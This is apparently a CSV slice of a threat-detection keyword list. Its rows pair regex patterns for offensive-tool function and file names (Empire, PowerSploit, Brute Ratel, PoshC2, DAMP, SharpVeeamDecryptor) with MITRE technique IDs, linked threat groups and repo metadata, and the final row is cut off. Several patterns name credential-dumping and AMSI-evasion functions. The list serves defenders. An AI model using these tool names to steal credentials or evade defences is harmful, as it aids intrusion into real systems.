"*Get-PrivilegedGroupMembership*",".{0,1000}Get\-PrivilegedGroupMembership.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","46185"
"*getprivs.bin*",".{0,1000}getprivs\.bin.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46186"
"*getprivs.exe*",".{0,1000}getprivs\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46187"
"*get-process *amsi.dll*",".{0,1000}get\-process\s.{0,1000}amsi\.dll.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46188"
"*GetProcHandleClient.exe *",".{0,1000}GetProcHandleClient\.exe\s.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","46189"
"*getProcUAC1password.h*",".{0,1000}getProcUAC1password\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","46190"
"*Get-PSADForestInfo *",".{0,1000}Get\-PSADForestInfo\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46191"
"*Get-PSADForestKRBTGTInfo *",".{0,1000}Get\-PSADForestKRBTGTInfo\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46192"
"*Get-PSAmsiScanResult *",".{0,1000}Get\-PSAmsiScanResult\s.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","46193"
"*Get-RBCD-Threaded*",".{0,1000}Get\-RBCD\-Threaded.{0,1000}","offensive_tool_keyword","Get-RBCD-Threaded","Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments","T1558 - T1208 - T1550 - T1484 - T1486","TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/FatRodzianko/Get-RBCD-Threaded","1","1","N/A","N/A","N/A","2","121","19","2021-08-10T23:29:48Z","2019-12-21T00:08:28Z","46194"
"*Get-RegAlwaysInstallElevated*",".{0,1000}Get\-RegAlwaysInstallElevated.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46195"
"*Get-RegAutoLogon*",".{0,1000}Get\-RegAutoLogon.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46196"
"*Get-RegistryAlwaysInstallElevated*",".{0,1000}Get\-RegistryAlwaysInstallElevated.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46197"
"*Get-RegistryAlwaysInstallElevated*",".{0,1000}Get\-RegistryAlwaysInstallElevated.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46198"
"*Get-RegistryAutoLogon*",".{0,1000}Get\-RegistryAutoLogon.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46199"
"*GetRegistryValue*SOFTWARE\Veeam\Veeam Backup Catalog*",".{0,1000}GetRegistryValue.{0,1000}SOFTWARE\\Veeam\\Veeam\sBackup\sCatalog.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059 - T1070.004","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","#registry","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","46201"
"*Get-RegLoggedOn *",".{0,1000}Get\-RegLoggedOn\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","46202"
"*Get-RegLoggedOn*",".{0,1000}Get\-RegLoggedOn.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46203"
"*GetRektBoy724/SharpUnhooker*",".{0,1000}GetRektBoy724\/SharpUnhooker.{0,1000}","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","N/A","9","5","400","80","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z","46204"
"*Get-RemoteCachedCredential*",".{0,1000}Get\-RemoteCachedCredential.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Get cached credentials (if any)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","46205"
"*Get-RemoteCachedCredential*",".{0,1000}Get\-RemoteCachedCredential.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","46206"
"*Get-RemoteCachedCredential*",".{0,1000}Get\-RemoteCachedCredential.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","46207"
"*Get-RemoteDesktopUserSessionList*",".{0,1000}Get\-RemoteDesktopUserSessionList.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","46208"
"*Get-RemoteDesktopUserSessionList.*",".{0,1000}Get\-RemoteDesktopUserSessionList\..{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","46209"
"*Get-RemoteLocalAccountHash*",".{0,1000}Get\-RemoteLocalAccountHash.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Get local account hashes","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","46210"
"*Get-RemoteLocalAccountHash*",".{0,1000}Get\-RemoteLocalAccountHash.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","46211"
"*Get-RemoteLocalAccountHash*",".{0,1000}Get\-RemoteLocalAccountHash.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","46212"
"*Get-RemoteLocalAccountHash.json*",".{0,1000}Get\-RemoteLocalAccountHash\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","46213"
"*Get-RemoteMachineAccountHash*",".{0,1000}Get\-RemoteMachineAccountHash.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Get machine account hash for silver ticket attack","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","46214"
"*Get-RemoteMachineAccountHash*",".{0,1000}Get\-RemoteMachineAccountHash.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","46215"
"*Get-RemoteMachineAccountHash.json*",".{0,1000}Get\-RemoteMachineAccountHash\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","46216"
"*getremoteprocesslisting*",".{0,1000}getremoteprocesslisting.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46217"
"*Get-RickAstley*",".{0,1000}Get\-RickAstley.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-RickAstley.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46218"
"*Get-RickAstley.ps1*",".{0,1000}Get\-RickAstley\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46219"
"*Get-RubeusForgeryArgs*",".{0,1000}Get\-RubeusForgeryArgs.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - 